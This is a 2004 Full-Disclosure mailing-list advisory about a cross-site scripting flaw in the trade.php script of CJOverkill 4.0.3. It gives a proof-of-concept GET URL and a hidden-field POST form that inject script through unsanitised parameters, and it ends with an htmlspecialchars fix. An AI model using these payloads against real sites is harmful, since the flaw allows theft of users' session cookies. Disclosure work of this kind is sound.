[Full-Disclosure] CJOverkill 4.0.3 XSS Proof of Concept

From: aCiDBiTS (acidbits_at_gmail.com)
Date: 10/11/04

  • Next message: debian-security-announce_at_lists.debian.org: "[Full-Disclosure] [SECURITY] [DSA 562-1] New mysql packages fix several vulnerabilities"
    To: full-disclosure@lists.netsys.com
    Date: Mon, 11 Oct 2004 10:55:48 +0200
    
    

    +--------------------------------------------------------+
    | CJOverkill 4.0.3 Cross Site Scripting Proof of Concept |
    | By aCiDBiTS acidbits@gmail.com 10-Oct-2004 |
    +--------------------------------------------------------+
        
        [ ]
            [ Your web application needs a security audit? ]
        [ Email me ! ]
            [ ]

    ------------
    Introduction
    ------------

    (http://cjoverkill.icefire.org/) "CJOverkill is a powerful traffic
    trading script that keeps its users happy with their site's growing
    traffic. Tested on high traffic sites and proven its outstanding
    performance, CJOverkill's security measures prevent others from trying
    to cheat you. With this script ,you can rest assured your site is in
    good hands."

    -------------
    Vulnerability
    -------------

    There is no user input sanitation for some parameters in trade.php.
    This can be exploited to insert html-script code that will be executed
    in the user browser, allowing to a malicious attacker to steal the
    user-cookie for that site. Maybe older versions also vulnerable.
    Vendor has been warned, an official patch will be released.

    ----------------
    Proof of Concept
    ----------------

    There are two ways to XSS through trade.php:

    (1.) GET. Victim should click on a link like: (needs register globals ON)

    http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E

    (2.) POST. Victim should click a form's submit button with hidden fields:

    <form action="http://URL_to_cjoverkill_script/trade.php"
    method="post"><input name="email" type="hidden" value="fake"><input
    name="add" type="hidden" value="1"><input name="url" type="hidden"
    value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;
    "><input name="" type="submit" value="Click me !"></form>

    ---------
    Quick fix
    ---------

    Edit trade.php, line 135:

            echo ("$tms[$i]<br>");

    Modify with:

            echo (htmlspecialchars($tms[$i])."<br>");

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: debian-security-announce_at_lists.debian.org: "[Full-Disclosure] [SECURITY] [DSA 562-1] New mysql packages fix several vulnerabilities"